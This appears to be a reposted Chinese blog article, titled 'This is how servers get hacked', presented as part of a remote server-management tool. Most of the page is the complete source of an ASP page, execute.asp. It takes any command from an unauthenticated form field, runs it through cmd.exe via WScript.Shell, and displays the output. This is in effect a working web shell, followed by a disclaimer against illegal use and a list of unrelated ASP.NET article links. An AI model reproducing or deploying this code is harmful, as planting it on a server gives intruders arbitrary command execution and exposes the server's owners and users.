| 最近正在写一个远程服务器管理的东东(借鉴了ase的部分代码、增加了远程执行命令、上传、服务等功能。) 值得注意的是,程序运行必须有filesystemobject支持。以下是远程执行命令的 原代码。copy下来另存为execute.asp. <html> <head> <meta http-equiv="content-language" content="zh-cn"> <meta http-equiv="content-type" content="text/html; charset=gb2312"> <meta name="generator" content="microsoft frontpage 4.0"> <meta name="progid" content="frontpage.editor.document"> <title>执行命令</title> <style> <!-- table,body{ font-family: 宋体; font-size: 9pt } a{ font-family: 宋体; font-size: 9pt; color: rgb(0,32,64); text-decoration: none } a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: none } a:visited{ color: rgb(128,0,0) } --> </style> </head> <body bgcolor="#000000" text="#c0c0c0"> <form method="post" action="execute.asp"> <p align="left">输入要执行的命令:<input type="text" name="ml" size="20" value="dir c:\" style="background-color: #c0c0c0; color: #000000; border-style: solid; border-width: 1"> <input type="submit" value="执行" name="b1" style="background-color: #c0c0c0; color: #000000; border: 1 groove #c0c0c0"></p> </form> <% ml=request.form("ml") cmd="c:\winnt\system32\cmd.exe /c "&ml&" >c:\whoami.txt" '修改 'whoami.txt路径到一个有写权限的目录 set wshshell = server.createobject("wscript.shell") retcode = wshshell.run(cmd, 1, true) if retcode = 0 then response.write ml & " " response.write " 命令成功执行!"&"<br><br>" else response.write " 命令执行失败!权限不够或者该程序无法在dos状态下运行!"&"<br><br>" end if 'response.write cmd function htmlencode(str) dim result dim l if isnull(str) then htmlencode="" exit function end if l=len(str) result="" dim i for i = 1 to l select case mid(str,i,1) case "<" result=result+"<" case ">" result=result+">" case chr(34) result=result+""" case "&" result=result+"&" case else result=result+mid(str,i,1) end select next htmlencode=result end function set fs =createobject("scripting.filesystemobject") set thisfile = fs.opentextfile("d:\foxzk\whoami.txt", 1, false) '读文件,别忘了修改路径. counter=0 do while not thisfile.atendofstream counter=counter+1 thisline=htmlencode(thisfile.readline) response.write thisline&"<br>" loop thisfile.close set fs=nothing %> </body> </html> 请勿将此程序用于非法途径,由此引起的一切后果由使用者承担 |
服务器就是这样被黑的
[入库:2005年8月18日] [更新:2007年3月24日]
本文简介:选择自 showman 的 blog
本文关键:服务器就是这样被黑的
相关方案
- ASP.NET 2.0 Bet…
- 一个图片数据的存和取的示例…
- 使用ASP.NET控件进行程序…
- 数据分页方法新思路,速度非常快…
- [我的ASP.net学习历程]…
- datalist我的示例…
- 基于数据库的三级菜单实现(二级…
- 数据库查询中的特殊字符的问题…
- 关于一点权限控件的一点想法!…
- CInt与Int的区别…
- 在自定义控件中引用用户控件,然…
- ASP.NET虚拟主机中For…
- 用ASP打开远端MDB文件的方…
- 对web.config的理解和…
- [我的ASP.net学习历程]…
- MIME小知识…
- .net中DataGrid显示…
- RSS 2.0规范…
- 如何从ACCESS数据库中读取…
- asp.net 连接数据库基础…
本站最佳浏览方式为 分辨率 1024x768 IE 6.0(或更高版本的 IE浏览器)
